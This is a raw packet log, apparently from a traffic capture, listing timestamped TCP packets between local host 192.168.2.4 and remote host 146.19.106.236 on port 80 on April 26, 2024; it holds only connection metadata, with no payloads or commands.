Apr 26, 2024 23:16:31.522593975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522639990 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524142027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524214029 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524265051 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524285078 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524327040 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524350882 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524369955 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524389982 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524406910 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524409056 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524427891 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524435043 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524452925 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524465084 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524540901 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524584055 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524722099 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524765015 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.524785995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524939060 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524975061 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.524983883 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.525018930 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.525110006 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.526221991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526241064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526288986 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.526402950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526469946 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526518106 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.526525021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526544094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.526592016 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.527558088 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527595997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527678967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527724981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.527741909 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527781963 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.527806997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527826071 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527844906 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527864933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527888060 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.527913094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.527914047 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527964115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.527992964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528008938 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.528065920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528227091 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.528749943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528769970 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528810978 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.528853893 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528872013 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528892040 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.528912067 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.529717922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.529781103 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.529786110 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.529808998 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.529834986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.529856920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.529866934 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.529897928 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.531943083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.531969070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.531994104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532040119 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532048941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532089949 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532098055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532134056 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532156944 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532200098 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532202005 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532227039 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532246113 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532310009 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532335997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532355070 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532360077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532406092 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532413960 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532452106 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532479048 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532495975 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532502890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532529116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532572031 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532574892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532598972 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532625914 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532645941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532694101 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532695055 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532783985 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532809973 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532834053 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532855988 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532856941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532881021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532892942 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532906055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532921076 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.532929897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.532975912 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.533272028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534146070 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534171104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534189939 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534219980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534250021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534272909 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534274101 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534298897 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534322023 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534348011 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534351110 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534372091 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534383059 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534396887 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534415960 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534424067 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534470081 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534490108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534513950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534538984 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534586906 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534590006 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534624100 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534641027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534671068 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534694910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534707069 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534912109 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.534965992 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.534981012 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535006046 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535032034 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535073996 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535080910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535110950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535125017 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535136938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535212994 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535221100 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535238028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535263062 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535304070 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535309076 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535353899 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535415888 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535470009 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535516977 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535540104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535566092 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535588026 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535696983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535871983 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535896063 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535928965 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.535929918 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535957098 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.535980940 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536001921 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536005974 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536024094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536031961 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536056995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536081076 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536114931 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536120892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536123037 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536144972 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536169052 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536194086 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536211014 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536218882 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536232948 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536247015 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536272049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536297083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536314011 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536320925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536334991 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536348104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536395073 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536412954 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536458969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536503077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536530018 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536555052 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536575079 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536576033 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536643028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536668062 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536714077 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.536731005 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.536818981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.537461042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537645102 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537702084 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537728071 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537751913 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.537753105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537776947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537779093 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.537822962 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.537843943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537868023 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.537970066 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.537981987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538011074 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538054943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538088083 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538194895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538219929 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538244963 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538244963 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538290024 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538299084 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538316011 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538362026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538413048 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538424969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538451910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538475037 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538518906 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538542986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538557053 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538609028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538655043 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538706064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538750887 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538775921 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538796902 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538827896 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538851976 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538872957 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.538899899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538944006 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.538955927 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539000988 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539026022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539066076 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539197922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539246082 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539251089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539277077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539360046 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539395094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539407015 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539421082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539441109 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539468050 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539534092 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539582968 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539616108 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539658070 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539727926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539880037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539910078 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539938927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.539969921 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.539992094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.540004015 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.540033102 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.540061951 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.540076971 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.540690899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.540759087 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.541285992 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.541421890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.541481972 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.541532993 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.541656971 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.541708946 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.542229891 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542475939 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542531013 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.542720079 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542752981 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542781115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542809010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542834997 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.542838097 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542860985 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.542891026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542917967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542947054 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542967081 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.542973042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.542988062 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.543015957 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.543035030 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.543800116 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.543828964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.543857098 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.543873072 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.543971062 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.543999910 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544028997 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544045925 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544056892 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544070959 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544085026 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544126034 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544126987 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544153929 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544183016 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544212103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544228077 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544241905 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544255972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544272900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544346094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544373035 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544392109 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544400930 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544424057 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544450045 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544478893 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544506073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544522047 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544533968 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544549942 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.544562101 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544589996 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.544635057 CEST	49732	80	192.168.2.4	146.19.106.236
